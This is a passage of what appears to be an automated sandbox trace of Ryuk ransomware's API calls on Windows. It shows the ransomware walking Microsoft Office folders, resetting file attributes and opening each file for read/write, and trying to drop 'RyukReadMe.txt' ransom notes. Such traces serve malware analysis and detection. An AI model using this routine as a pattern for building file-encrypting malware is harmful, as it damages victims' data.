dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.639] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.639] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.639] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.639] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.639] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB4.BDR", dwFileAttributes=0x80) returned 0 [0137.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB4.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub4.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.640] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.640] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.640] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.640] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB5A.BDR", dwFileAttributes=0x80) returned 0 [0137.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB5A.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub5a.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.640] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.640] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.640] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.640] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.641] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB5B.BDR", dwFileAttributes=0x80) returned 0 [0137.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB5B.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub5b.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.641] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.641] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.641] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.641] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.641] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB6.BDR", dwFileAttributes=0x80) returned 0 [0137.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB6.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub6.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.641] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.641] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.642] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.642] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB7.BDR", dwFileAttributes=0x80) returned 0 [0137.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB7.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub7.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.642] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.642] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.642] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.642] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB8.BDR", dwFileAttributes=0x80) returned 0 [0137.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB8.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub8.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.643] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.643] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.643] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.643] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.643] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB9.BDR", dwFileAttributes=0x80) returned 0 [0137.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB9.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub9.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.643] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.643] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.643] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.643] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.644] SetLastError (dwErrCode=0x0) [0137.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.647] GetLastError () returned 0x5 [0137.647] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.647] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.647] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.647] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.647] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.647] SetLastError (dwErrCode=0x0) [0137.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.647] GetLastError () returned 0x5 [0137.647] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.647] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.647] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.649] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.649] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.649] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ACCSBAR.POC", dwFileAttributes=0x80) returned 0 [0137.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ACCSBAR.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\accsbar.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.652] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.652] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.652] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.652] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.653] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ACCTBOX.POC", dwFileAttributes=0x80) returned 0 [0137.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ACCTBOX.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\acctbox.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.653] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.653] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.653] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.653] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.653] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.DPV", dwFileAttributes=0x80) returned 0 [0137.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ad.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.653] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.654] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.654] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.654] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.654] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.XML", dwFileAttributes=0x80) returned 0 [0137.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.654] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.654] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.654] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.654] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.654] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD98.POC", dwFileAttributes=0x80) returned 0 [0137.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ad98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.655] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.655] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.655] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.655] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.655] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ADRESPEL.POC", dwFileAttributes=0x80) returned 0 [0137.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ADRESPEL.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\adrespel.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.655] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.655] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.655] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.655] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.655] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AIR98.POC", dwFileAttributes=0x80) returned 0 [0137.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AIR98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\air98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.656] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.656] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.656] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.656] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AWARDHM.POC", dwFileAttributes=0x80) returned 0 [0137.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AWARDHM.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\awardhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.656] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.656] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.656] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.656] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.657] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BAN98.POC", dwFileAttributes=0x80) returned 0 [0137.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BAN98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ban98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.657] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.657] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.657] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.657] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.657] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.DPV", dwFileAttributes=0x80) returned 0 [0137.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\banner.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.657] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.657] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.658] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.658] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.658] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.XML", dwFileAttributes=0x80) returned 0 [0137.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\banner.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.658] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.658] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.658] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.658] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.658] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BDRTKFUL.POC", dwFileAttributes=0x80) returned 0 [0137.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BDRTKFUL.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bdrtkful.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.659] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.659] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.659] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.659] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.DPV", dwFileAttributes=0x80) returned 0 [0137.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizcard.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.659] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.659] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.659] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.659] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.XML", dwFileAttributes=0x80) returned 0 [0137.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizcard.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.660] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.660] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.660] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.DPV", dwFileAttributes=0x80) returned 0 [0137.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizform.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.660] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.660] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.XML", dwFileAttributes=0x80) returned 0 [0137.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizform.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.661] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.661] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.661] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.661] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BORDERBB.DPV", dwFileAttributes=0x80) returned 0 [0137.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BORDERBB.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\borderbb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.661] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.661] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.662] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.662] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BORDERBB.POC", dwFileAttributes=0x80) returned 0 [0137.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BORDERBB.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\borderbb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.662] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.662] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.662] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.662] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BRCH98SP.POC", dwFileAttributes=0x80) returned 0 [0137.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BRCH98SP.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\brch98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.663] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.663] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.663] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BRCHUR11.POC", dwFileAttributes=0x80) returned 0 [0137.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BRCHUR11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\brchur11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.663] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.663] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.663] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, 